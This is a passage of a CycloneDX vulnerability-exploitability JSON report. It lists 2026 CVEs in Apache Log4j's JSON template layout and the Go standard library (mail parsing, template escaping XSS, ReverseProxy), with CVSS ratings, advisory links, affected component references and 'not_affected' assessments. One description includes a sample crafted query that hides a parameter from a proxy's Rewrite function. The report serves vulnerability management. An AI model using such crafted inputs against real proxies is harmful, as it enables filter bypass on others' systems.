"urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#42449972-57e6-4a8c-b0e9-185279115fbf" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#42449972-57e6-4a8c-b0e9-185279115fbf" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#42449972-57e6-4a8c-b0e9-185279115fbf" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#42449972-57e6-4a8c-b0e9-185279115fbf" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4aae5298-979f-4cfa-8315-75bdce2e9de0" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4aae5298-979f-4cfa-8315-75bdce2e9de0" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4aae5298-979f-4cfa-8315-75bdce2e9de0" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4aae5298-979f-4cfa-8315-75bdce2e9de0" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-34481", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven" }, "ratings": [ { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "cwes": [ 116 ], "description": "Apache Log4j's JsonTemplateLayout https://logging.apache.org/log4j/2.x/manual/json-template-layout.html , in versions up to and including 2.25.3, produces invalid JSON output when log events contain non-finite floating-point values (NaN, Infinity, or -Infinity), which are prohibited by RFC 8259. This may cause downstream log processing systems to reject or fail to index affected records.\n\nAn attacker can exploit this issue only if both of the following conditions are met:\n\n * The application uses JsonTemplateLayout.\n * The application logs a MapMessage containing an attacker-controlled floating-point value.\n\n\nUsers are advised to upgrade to Apache Log4j JSON Template Layout 2.25.4, which corrects this issue.", "recommendation": "Upgrade org.apache.logging.log4j:log4j-layout-template-json to version 2.25.4", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-34481" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/10/10" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-34481" }, { "url": "https://github.com/apache/logging-log4j2" }, { "url": "https://github.com/apache/logging-log4j2/pull/4080" }, { "url": "https://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf5mqz6lhopcv" }, { "url": "https://logging.apache.org/cyclonedx/vdr.xml" }, { "url": "https://logging.apache.org/log4j/2.x/manual/json-template-layout.html" }, { "url": "https://logging.apache.org/security.html#CVE-2026-34481" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34481" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-34481" } ], "published": "2026-04-10T16:16:31+00:00", "updated": "2026-04-24T18:24:14+00:00", "affects": [ { "ref": "pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3", "versions": [ { "version": "2.25.3", "status": "affected" } ] }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-39820", "source": { "name": "govulndb", "url": "https://pkg.go.dev/vuln/" }, "ratings": [ { "source": { "name": "bitnami" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "description": "Well-crafted inputs reaching ParseAddress, ParseAddressList, and ParseDate were able to trigger excessive CPU exhaustion and memory allocations.", "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-39820" }, { "url": "https://go.dev/cl/759940" }, { "url": "https://go.dev/issue/78566" }, { "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39820" }, { "url": "https://pkg.go.dev/vuln/GO-2026-4986" } ], "published": "2026-05-07T20:16:43+00:00", "updated": "2026-05-08T15:16:37+00:00", "affects": [ { "ref": "pkg:golang/stdlib@v1.26.2", "versions": [ { "version": "v1.26.2", "status": "affected" } ] }, { "ref": "pkg:golang/stdlib@v1.26.2", "versions": [ { "version": "v1.26.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-39823", "source": { "name": "govulndb", "url": "https://pkg.go.dev/vuln/" }, "ratings": [ { "source": { "name": "bitnami" }, "score": 6.1, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], "description": "CVE-2026-27142 fixed a vulnerability in which URLs were not correctly escaped inside of a tag's attribute. If the URL content were to insert ASCII whitespaces around the '=' rune inside of the attribute, the escaper would fail to similarly escape it, leading to XSS.", "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-39823" }, { "url": "https://go.dev/cl/769920" }, { "url": "https://go.dev/issue/78913" }, { "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39823" }, { "url": "https://pkg.go.dev/vuln/GO-2026-4982" } ], "published": "2026-05-07T20:16:43+00:00", "updated": "2026-05-08T15:16:37+00:00", "affects": [ { "ref": "pkg:golang/stdlib@v1.26.2", "versions": [ { "version": "v1.26.2", "status": "affected" } ] }, { "ref": "pkg:golang/stdlib@v1.26.2", "versions": [ { "version": "v1.26.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-39825", "source": { "name": "govulndb", "url": "https://pkg.go.dev/vuln/" }, "ratings": [ { "source": { "name": "bitnami" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], "description": "ReverseProxy can forward queries containing parameters not visible to Rewrite functions. When used with a Rewrite function, or a Director function which parses query parameters, ReverseProxy sanitizes the forwarded request to remove query parameters which are not parsed by url.ParseQuery. ReverseProxy does not take ParseQuery's limit on the total number of query parameters (controlled by GODEBUG=urlmaxqueryparams=N) into account. This can permit ReverseProxy to forward a request containing a query parameter that is not visible to the Rewrite function. For example, the query \"a1=x&a2=x&...&a10000=x&hidden=y\" can forward the parameter \"hidden=y\" while hiding it from the proxy's Rewrite function.", "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-39825" }, { "url": "https://go.dev/cl/770541" }, { "url": "https://go.dev/issue/78948" }, { "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39825" }, { "url": "https://pkg.go.dev/vuln/GO-2026-4976" } ], "published": "2026-05-07T20:16:43+00:00", "updated": "2026-05-08T22:16:29+00:00", "affects": [ { "ref": "pkg:golang/stdlib@v1.26.2", "versions": [ { "version": "v1.26.2", "status": "affected" } ] }, { "ref": "pkg:golang/stdlib@v1.26.2", "versions": [ { "version": "v1.26.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#03e694fc-d558-4767-829d-476067d21d27" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:golang/stdlib@v1.26.2" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#bfc8d26f-8f21-4567-9644-2df9ef7be749" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#342b5a22-4d6a-48c4-ac99-7dc5bd483e33" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#86be76e0-5082-482f-8cd2-021a6b908a2d" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#8fd2441f-485f-48d4-87e6-88ee68170c78" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#243ba180-3ca7-4c1e-8f97-3a055559f069" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#77c64883-13a5-4a9e-9193-b852dded3040" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#024e5643-b5d1-497d-a176-16df16107f8f" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#9059d290-89bc-43aa-9fb0-6dce2d46493d" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#08305b0a-6ce8-42a6-bf08-1c9d8ccba213" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#07489459-3dfe-4578-adec-33c28eb9f4a5" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#3c00f8ec-273d-4711-93a2-9e2f61201ec5" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-39826", "source": { "name": "govulndb", "url": "https://pkg.go.dev/vuln/" }, "ratings": [ { "source": { "name": "bitnami" }, "score": 6.1, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], "description": "If a trusted template author were to write a